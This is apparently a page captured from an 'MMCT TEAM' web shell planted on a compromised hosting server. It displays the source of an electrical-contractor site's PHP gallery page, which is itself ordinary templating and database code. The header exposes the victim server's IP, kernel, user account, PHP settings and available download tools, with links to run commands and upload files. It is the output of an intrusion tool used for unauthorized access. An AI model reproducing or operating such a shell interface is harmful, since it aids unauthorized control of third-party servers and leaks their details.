MMCT TEAM
Server IP : 103.53.40.154  /  Your IP : 18.224.73.157
Web Server : Apache
System : Linux md-in-35.webhostbox.net 4.19.286-203.ELK.el7.x86_64 #1 SMP Wed Jun 14 04:33:55 CDT 2023 x86_64
User : ppcad7no ( 715)
PHP Version : 8.2.25
Disable Function : NONE
MySQL : OFF  |  cURL : ON  |  WGET : ON  |  Perl : ON  |  Python : ON
Directory (0750) :  /home2/ppcad7no/arelectricalcontrol.com/

[  Home  ][  C0mmand  ][  Upload File  ]

Current File : /home2/ppcad7no/arelectricalcontrol.com/gallery.php
<!doctype html>
<html class="no-js" lang="zxx">

<head>
    <?php include "top-links.php";?>
    
    <title><?=$datagallery['site_pages_meta_title'];?></title>
    <meta name="description" content="<?=$datagallery['site_pages_meta_description'];?>">
</head>

<body class="home-electrician"> 
    
    <?php include "header.php";?>
    
    <div class="breadcumb-wrapper" data-bg-src="assets/img/bg/breadcumb-bg.jpg">
        <div class="container">
            <div class="breadcumb-content">
                <h1 class="breadcumb-title">Our Gallery</h1>
                <ul class="breadcumb-menu">
                    <li><a href="<?=$wspath;?>">Home</a></li>
                    <li>Our Gallery</li>
                </ul>
            </div>
        </div>
    </div>
  
    <div class="overflow-hidden space">
        <div class="container">
            <!--<div class="title-area text-center"><span class="sub-title2">-->
            <!--    <img src="assets/img/theme-img/title_icon5.svg" alt="<?=$site_name;?>" title="<?=$site_name;?>">Our Best Gallery</span>-->
            <!--    <h2 class="sec-title">Our Awesome Gallery</h2>-->
            <!--</div>-->
            <div class="row gy-4">
                <?php
                    $sqlprod = "SELECT * FROM `tbl_gallery`";
                    $runprod = mysqli_query($db,$sqlprod) or die("Query Not run");
                    while($dataprod = mysqli_fetch_assoc($runprod)){
                ?>
                <div class="col-xl-3 col-md-6 filter-item">
                    <div class="gallery-grid">
                        <div class="box-img"><img src="<?=$wspath?>admin/images/gallery/<?=$dataprod['image'];?>" alt="<?=$site_name;?>" title="<?=$site_name;?>"></div>
                        <a href="<?=$wspath?>admin/images/gallery/<?=$dataprod['image'];?>" class="icon-btn popup-image"><i class="fal fa-plus"></i></a>
                    </div>
                </div>
                <?php } ?>
            </div>
        </div>
    </div>
    
    <?php include "footer.php";?>  
    
</body>

</html>

MMCT - 2023